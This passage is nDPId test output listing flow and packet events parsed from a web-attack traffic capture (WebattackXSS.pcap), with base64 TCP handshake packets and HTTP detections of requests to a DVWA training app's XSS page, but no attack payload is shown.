-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0I8ZAAD4GohKsEAABwKgKMsxMAFCAL9N3349j9oAQAOXjKAAAAQEICgE48LQD4sIq"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z5FAAD4GXj+sEAABwKgKMsxeAFDFSpaVAAAAAKACchBEOAAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976999,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976999,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8v9RAAD4GBfysEAABwKgKMsxgAFByIk7QAAAAAKACchDfIwAAAgQFtAQCCAoBOPEEAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzF63DJWlxUqWlqAScSAyBwAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1499346983176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346983176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ikVAAD4GO5OsEAABwKgKMsyiAFBY531JbqxFpIAQAOXizQAAAQEICgE49wwD4siD"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346984469,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346984469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8puFAAD4GHu+sEAABwKgKMsywAFBLrV6uAAAAAKACchDuHwAAAgQFtAQCCAoBOPhPAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1499346984469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzLBWnxN3S61er6AScSC3PwAAAgQFtAQCCAoD4snGATj4TwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1499346984470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346984470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0puJAAD4GHvasEAABwKgKMsywAFBLrV6vVp8TeIAQAOVWRgAAAQEICgE4+FAD4snG"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346985762,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346985762,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8k7hAAD4GMhisEAABwKgKMsy+AFBA2morAAAAAKACchDsIwAAAgQFtAQCCAoBOPmTAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzL4AEHgfQNpqLKAScSCl5gAAAgQFtAQCCAoD4ssKATj5kwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1499346985762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0k7lAAD4GMh+sEAABwKgKMsy+AFBA2mosABB4IIAQAOVE7gAAAQEICgE4+ZMD4ssK"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346988319,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346988319,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NptAAD4GjzWsEAABwKgKMszYAFB2NsqJAAAAAKACchBT0AAAAgQFtAQCCAoBOPwSAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzNhVLB2odjbKiqAScSAQbwAAAgQFtAQCCAoD4s2JATj8EgEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1499346988319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NpxAAD4GjzysEAABwKgKMszYAFB2NsqKVSwdqYAQAOWvdgAAAQEICgE4\/BID4s2J"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346989580,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346989580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HPhAAD4GqNisEAABwKgKMszmAFB8FOG1AAAAAKACchA1fQAAAgQFtAQCCAoBOP1NAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1499346989580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzOZrnFEQfBThtqAScSCnCAAAAgQFtAQCCAoD4s7EATj9TQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1499346989581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346989581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HPlAAD4GqN+sEAABwKgKMszmAFB8FOG2a5xREYAQAOVGDwAAAQEICgE4\/U4D4s7E"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346992144,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346992144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA855pAAD4G3jWsEAABwKgKMs0AAFBUEBhUAAAAAKACchAkSAAAAgQFtAQCCAoBOP\/OAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1499346992144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQA256uwVBAYVaAScSBtZwAAAgQFtAQCCAoD4tFFATj\/zgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1499346992145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346992145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA055tAAD4G3jysEAABwKgKMs0AAFBUEBhVNuersYAQAOUMbgAAAQEICgE4\/88D4tFF"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346993434,"flow_last_seen":1499346993434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346993434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1499346993434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QspAAD4GgwasEAABwKgKMs0OAFBi7kPbAAAAAKACchDokQAAAgQFtAQCCAoBOQERAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1499346993435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQ7bbxEWYu5D3KAScSAmgAAAAgQFtAQCCAoD4tKIATkBEQEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1499346993435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346993435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QstAAD4Ggw2sEAABwKgKMs0OAFBi7kPc228RF4AQAOXFhwAAAQEICgE5ARED4tKI"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346994731,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346994731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 